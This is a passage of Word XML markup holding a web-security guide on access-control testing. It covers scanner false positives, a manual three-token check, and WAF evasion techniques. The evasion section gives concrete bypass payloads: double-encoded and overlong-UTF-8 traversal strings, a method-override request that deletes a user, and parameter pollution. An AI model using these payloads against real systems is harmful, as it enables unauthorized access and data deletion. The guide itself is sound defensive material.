    <w:p w14:paraId="55C2F3FC" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>The False Positive Problem</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3316FF36"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Automated scanners (especially DAST and vulnerability scanners) evaluate access control by blindly modifying parameters and comparing HTTP status codes or page</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14498D57"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lengths. This mechanical approach frequently triggers false positives, sending development teams on wild goose chases.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64C00A76"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Common False Positive Scenarios</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="365E3220" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>The "Friendly Redirect" or Custom Error Page:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> A DAST scanner attempts to access a restricted page (e.g., /admin) as an unauthenticated guest. The application responds with a custom 200 OK page that displays a message saying </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>"You do not have permission to view this page, please log in."</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Because the scanner sees a 200 OK status code instead of a 403 Forbidden or 401 Unauthorized , it erroneously flags a critical access control failure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56B5C69F" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Public/Shared Resources Misidentified as Private:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> A scanner flags an IDOR vulnerability because User A can access a resource identifier belonging to User B (e.g., /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>/products/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>get?id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">=992). However, the resource in question is intended to </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>be universally public (like a public store item or a shared knowledge-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>base</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> article), meaning no access restrictions are actually required.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1691A92A" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Idempotent Data Updates with Generic Responses:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> A scanner tries to modify another user's profile data via a PUT request. The backend securely blocks the modification behind the scenes, but outputs a generic, static success wrapper JSON payload: {"status": "processed"}. The scanner reads the static text and assumes the unauthorized action succeeded.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D137D35"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How to Verify Manually (Saving Dev Time)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FB74900"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 xml:space="preserve">To cut through scanner noise, use a </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>three-token test</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> using a proxy like Burp Suite or OWASP ZAP:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55784A75" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Log in as three distinct entities:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> User A (Privileged/Admin), User B (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Lowprivileged</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> standard user), and Guest (Unauthenticated).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02CD52F5" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Capture the legitimate transaction:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Execute the target action as User A and save the exact raw request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19F43C6D" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Replay and Swap:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Copy User A's request, swap out </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>only</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> the authentication header/cookie with User B's token, and send it. Repeat the step with the Guest token.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49BED6A6" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Inspect the actual State Change:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Do not just look at the HTTP status code. Look at the </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>database state</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> or the returned data payload. If User B's token returns User A's private details or alters User A's configuration, you have manually verified a true positive. If the UI claims it worked but no data changed or leaked, it is a false positive.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="393D7FDD" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Evasion Techniques</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="075F07CC"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Advanced attackers know that entry-level security infrastructure (like standard Web Application Firewalls) relies on rigid, pattern-matching regex rules to block common exploits. To bypass these, they obscure their intentions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63BACDA9"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1. Parameter and Path Encoding</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1070C136"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If a basic rule blocks directory navigation or administrative strings, attackers use alternative encodings that a WAF might fail to decode, but the underlying application framework (like Tomcat, IIS, or Node) automatically resolves:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50B0EEE9" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>URL Double Encoding:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Instead of /admin, an attacker uses %252fadmin or %252e%252e%252fadmin (double encoding the slashes and dots) to slip past firewall inspectors that only decode incoming traffic once.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ECA46A0" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Unicode / Multi-byte Obfuscation:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Replacing standard characters with nested Unicode equivalents (e.g., using ..%c0%af for a backslash) to trick regex parsers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="210423C5"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2. HTTP Method Override and Tunneling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36DD0686"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If an API gateway blocks unauthorized DELETE or PUT calls to an endpoint, attackers will downgrade the call to a standard POST or GET (which are usually allowed for broad public access) and use override headers to communicate their true intent directly to the backend:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="585000DE" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t>HTTP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="103E3BB6" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t>POST /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t>/v1/users/1005/delete HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E8580A5" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t>X-HTTP-Method-Override: DELETE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22A51761" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t>X-Method-Override: DELETE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="327EAB1F"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If the backend application logic supports these legacy or custom debugging headers, it processes the request as a DELETE, bypassing the WAF's method filter entirely.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="407797A8"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3. Parameter Pollution (HPP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4701E83D"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Attackers supply the same parameter multiple times within a single query string or payload. Different application servers process multi-parameter strings in inconsistent ways:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F374EB1" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t>HTTP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77D2B0AB" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t>GET /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t>/account/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t>view?acct</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t>attacker&amp;acct</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t>=victim</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68D07E30" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>The WAF</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> might check only the </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>first</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> occurrence (acct=attacker), see that the user is accessing their own account, and clear the traffic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2185F133" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>The Backend Server</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> (like ASP.NET) might concatenate them or prioritize the </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>last</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
